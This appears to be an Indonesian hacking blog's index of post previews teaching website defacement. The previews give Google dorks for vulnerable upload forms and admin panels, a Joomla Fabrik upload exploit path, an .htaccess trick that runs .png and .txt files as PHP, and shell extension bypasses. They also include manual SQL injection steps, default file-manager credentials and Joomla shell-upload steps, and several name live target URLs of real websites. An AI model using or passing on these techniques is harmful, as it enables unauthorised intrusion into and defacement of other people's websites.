siapin bahan dolo gaes :) 1.Dork : inurl:index.php?option=com_fabrik inurl:index.php/component/fabrik/ site: inurl:index.php?option=com_fabrik&view= site: inurl:importcsv.php site: inurl:viewTable?cid= site:com inurl:/Com_Fabrik Site:go.id(Selebihnya kebangin lg menggunakan imajinasi, site bisa di ganti jadi .org/.za/.br/.nl pokoknya kembangin biar dpt verawan :v) 2.Exploit : /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload 3.Csrf : Touch Me Bep 4..htaccess :) #Alternate default index page DirectoryIndex index.html AddType application/x-httpd-php .png AddType application/x-httpd-php .txt AddType application/x-httpd-php .flaatas copy noh trus save jadi...

Read more »

Deface Take Over Github Live Target

Hello Gan :") kembali dengan gw si ./SilentGhost GANS :v KALI ini gw akan memberikan tuturial deface take over from github okok daripada banyak bacod kita langsung mulai aja hwhw -siapan nih bahan: -Script Deface elu gan :) klo punya gw nih :v Tapi boong ;bTinggal copy,Trus paste semua trus paste ke notepad /aplikasi buat Html trus save :) -Akun github Loklo belum punya buat dulu atau klik di bawah :) Clik here - domain github : grab.github.io/animedb.org - reverse IP onlen cek this out⬇⬇⬇BISA LIHAT DISINI :) ATAU DISINI JUGA BOLEH :) - HTTP status checker ⬇Bisa Dilihat Disini Langsung ke Tutorialnya hwhw :v - Siapin akun github Lo kimaq :v - pergi ke reverse IP lookup - Masukin Url grab.github.io - nanti disitu banyak dns web web - langsung...

Read more »

Deface Dengan Cara CSRF File Upload Vulnerability

hallo good peoplekali ini gue akan share Deface Dengan Cara CSRF File Upload VulnerabilitySedikit gw jelasin, cara ini memanfaatkan form upload yang tidak di filterOk langsung aja ya ganDork : inurl:upload.php           inurl:admin/upload.php           ( Selebihnya kembangin sendiri ya )Gw menggunakan Brute force files and directory website, kalian bisa download di http://trolling-system.blogspot.com/2018/03/bruteforce-files-directory-website.htmlLive target http://bajugrosir.com/admin/upload2.php1. Disitu tertulis , There was a problem with the upload , yap berarti tidak di filter sama adminnya2. Ok lanjut aja kita buat CSRF nya, script csrf nya kalian bisa ambil di...

Read more »

DORK FRESH BYPASS ADMIN ( NEW 2018 )

ALPHRA87 - Kumpulan Dork fresh Bypass Admin ( New 2018 )Bypass Admin adalah suatu teknik menginjeksi halaman login web dengan perintah tertentu. mengapa teknik ini dapat dilakukan? karena web tersebut mempunyai/terdapat celah/lubang keamanan dikarenakan kelalaian si Admin web tersebut. Ya kurang lebih seperti itu.Dork :inurl:/adminpanel intext:"welcome to administrator panel"inurl:/admin/login.php site:.ininurl:/add_product.phpinurl:/add_gallery.phpinurl:/edit_category.phpinurl:/add_news.phpintitle:"welcome to administrator" site:.ukinurl:/add_article.phpinurl:/manage_category.phpinurl:/add_user.phpinurl:/edit_user.phpintext:"dashboard admin panel"intext:"design by"intext:"username"intext:"password"intext:"login gagal"inurl:/admin/setting.phpintext:"change...

Read more »

Deface Dengan Cara SQL Injection Manual

hallo kawan :Dkembali lagi bersama gue admin yg ganteng :vSetelah sekian lama tidak posting artikel, ya maaf sibuk dengan sekolah ( adminnya masih sekolah gan ), teman, pelajaran , dan yang pasti pacar wwkwkkali ini gue akan memberikan tutorial Deface Dengan Cara SQL Injection Manualbeberapa bulan lalu gue memberikan tutorial sqli dengan pakai SQLMAP, Nah sekarang gue memberikan caranya dengan cara manuallangsung aja ya gan, sans aja live target udh gue sediakan kok :DLIVE TARGET : http://garudatransindonesia.com/artikel.php?id=91. Untuk inject nya lebih mudah pakai Mozilla firefox + hackbar ya :D2. Masukkan payload ( ' ) *tanpa tanda kurung , di akhir URL, maka website akan blank, menandakan bahwa web tersebut vuln SQL Injectionhttp://garudatransindonesia.com/artikel.php?id=9'3....

Read more »

Deface Dengan Cara URL Poisoning

hallo gan :Dok kali ini gw share Deface Dengan Cara URL Poisoning Cara ini cukup mudah kok , langsung aja ya caranya :DSekilas gw jelasin sedikit apa itu URL Poisoning ??URL Poisoning, juga dikenal sebagai ( Location Poisoning )Adalah metode pelacakan perilaku pengguna Web dengan menambahkan nomor identifikasi (ID) ke alamat halaman URL (Uniform Resource Locator) baris browser Web ketika pengguna mengunjungi situs tertentu. Nomor ID ini kemudian dapat digunakan untuk menentukan halaman mana di situs yang dikunjungi pengguna sesudahnya. Menggabungkan informasi semacam ini dapat berguna untuk memahami bagaimana pengguna mendapatkan halaman, produk atau layanan apa yang mungkin mereka minati, dan menghubungkan perilaku pengguna dengan...

Read more »

Deface Dengan Cara Download Database SQL

hallo people >:(back lg bersama gw admin >:(Kali ini gw share tutorial deface ni ganDeface Dengan Cara Download Database SQLSekilas gw jelasinJadi cara deface ini kita memanfaatkan dari si admin website tersebut, karena menyisipkan file database.sql nya di public_html :DSaran gw untuk admin website lainnya, JANGAN PERNAH menyisipkan file yang penting di website, baik itu backup-an , database , user & password dll nyaLalu sedikit saran lagi, File config dari website harus di ubah permission nyafile config berbagai macam jenis & namanya, gw jelasin nih , menurut sepengetahuan gwCMS Wordpress = wp-config.phpCMS Joomla = configuration.phpCMS Lokomedia = Config.phpCMS nya gw gatau, tapi biasanya diadmin/models/db-settings.phpadmin/includes/config.phpNah...

Read more »

Deface Dengan Cara Admin Weak Password / Admin Poor Password

Hallo sobat :DKembali lg bersama gw disini sebagai penulis wkwkwk :vKali ini gw share Deface Dengan Cara Admin Weak Password / Admin Poor PasswordYap, teknik / cara deface ini cukup simple ya, tapi agak susah juga cari target nyasebenarnya gw udh dpet dri minggu kmren, cuman krna sibuk gan sama real life . jdi ga sempet nulis tutorOk langsung ajaDORK : inurl:admin123/login.php              intitle:Login              ( Selebihnya kembangin lagi dorknya wkwk ) :DOk yg pertama kalian harus dorking dulu ke google atau search engine lainnya :Dkrna gw disini udh ada target nya, maka langsung aja menuju ke halaman login adminKarna cara deface ini memakai teknik Admin Weak Password/...

Read more »

Deface Dengan Cara Jquery File Upload

hallo guys :DKembali lg bersama gw disini admin XDKali ini gw ingin share teknik deface Jquery File Upload Cara deface ini memakai CSRF ya :)Dork = inurl:upload/server/php/             inurl:admin/upload/server/php          ( SELEBIHNYA KEMBANGKAN SENDIRI YA ) Atau chat di fanpage facebook ya di https://facebook.com/trollyoursystemCSRF = http://trolling-system.ooo/csrf-jquery.txt ( Upload / save di web ya, ubah site.com menjadi                  url target )Extensi shell = [ .php5 ] [ .phtml ] [ php.xxxjpg ] [ php.pjpeg ] Selebihnya sepinter pinter kalian okLive target, bagi yang mau mencoba nya = http://www.baba-bahaa.com/ADMIN/pages/upload/server/php/Ok...

Read more »

Deface Dengan Cara TinyMce Plugins Image Manager

hallo sobat, kembali lagi di blog Trolling-system :DSebenarnya tutorial deface ini udh ada dari lama, cuman karna sibuk sama real life jadi ga sempet nulis tutorialOk kali ini gw share deface POC TinyMce Plugins Image Manager caranya cukup mudah, , siapkan dulu shell yang ber extensi .jpgOk langsung ajaDORK : inurl:/tinymce/plugins/image/ ( Selebihnya kembangkan sendiri )Exploit : site.com/(path)/tinymce/plugins/image/upload.phpLive Target : https://www.madisonts.com/js/tinymce/plugins/image/upload.php1. Kalian dorking dulu ke google, bing atau search engine lainnya, pke dork di atas yg gw kasih2. site yg vuln seperti ini     Vuln tidak juga ada yg seperti itu, ada juga yg blank seperti ini 3. Selanjutnya...

Read more »

Deface Dengan Cara PHP File Manager Default User & Password

hi dude, im back >_<Yap wassap kali ini gw mau share tutorial DEFACE DENGAN CARA PHP FILE MANAGER DEFAULT USER & PASSWORDOh iya deface ini gk ribet kok, tinggal upload shell kalian, langsung aja ya caranyaDORKinurl:"PHP FILE MANAGER" ext:phpinurl:"filemanager" ext:php1. lo dorking ke google atau bing atau search engine lainnya, lalu cari web yg ada filemanager nyacontoh seperti ini2. Nah kita disuruh masukin username sama password :(, sans jgn sedih dulu, kita coba aja masukin username & password nya iniUsername : fm_adminPassword : fm_adminKita lihat hasilnyaYou are logged in , tau kan artinya apa? yap kita udh berhasil login pakai username dan password yg gw kasih >_<Nah kalau sudah login, bebas mau lo apain, upload...

Read more »

Deface Dengan Cara Server Side Include Injection (SSI Injection)

Hallo dude kembali lagi dengan admin Trolling System :)Sebelumnya dari gw sendiri serta admin yang lain mengucapkanMinal aidzin wal faidzin, Mohon maaf lahir batin :)Mohon di maafkan bila admin berkata yang tidak sewajarnya dan tidak pantas di blog ini, mohon di maafkan :)Dan hari ini gw ingin share POC Deface Dengan Cara Server Side Include Injection (SSI Injection)Lalu apa itu SSI InjectionGw jelasin sedikit apa itu SSI InjectionServer Side Includes (SSI) adalah bahasa server untuk halaman web, yang dirancang untuk membuat halaman HTML statis sedikit lebih dinamis.SSI bermaksud membuat halaman HTML mirip dengan aplikasi dinamis, seperti yang ditulis dalam ASP, PHP dan bahasa yang serupa dan memungkinkan penyertaan server informasi dinamis...

Read more »

Cara Upload Shell Di CMS Joomla

Hallo gankarna gw udh nemu live target nya jadi gw disini mau share cara upload shell di joomla, yapMungkin kalo upload shell di CMS Wordpress mah easy ya wkwkwkBerbeda dengan CMS JoomlaOk langsung aja gan1. yg pasti lo harus udh login ke halaman administrator lah :D , Default login admin di cms joomla yaitu di site.com/administrator2. Lo ke menu template, look at picture3. Kalo udh , cari template yg aktif, yg aktif itu ada tanda bintang sperti ini4. Yap sekarang ke menu templates, look at picture5. Cari template yg tadi aktif, gw udh nemu nih template yg tadi aktif6. Klik template yg aktif tadi, damn kita kita udh diberi akses buat ngedit file filenya, nah disini kita mainkan, Mending upload uploader dlu, baru nnti upload shellGw mau coba...

Read more »

Cara Deface Poc Chiangraientersoft HTML Injection Vulnerability

Hallo ganKali ini gw mau share tutorial deface NewYaitu deface dengan caraChiangraientersoft HTML Injection VulnerabilityLangsung aja ya ganDORK : inurl:webboard site:thPOC : REGISTER  > ADD TOPIC > UPLOAD YOUR SHELL EXT .PHPTUTORIAL INI HANYA PADA WEBSITE THAILAND SAJA :D1. Dorking ke google pke dork    inurl:webboard site:th2. Sebelomnya lo harus register dulu, cari aja pasti ada kok tempat buat registernya3. Klo udh register, Cari yg ada tempat upload seperti ini4. Yap kalo udh cari yg ada tmpt upload, isi data data ngasal juga boleh5. Udh di upload? ok skrg balik ke menu webboard nya     Lihat udh ada blm postingan kita? klo udh ada sprti ini6. Nah terus buka postingan lo, ada gambar...

Read more »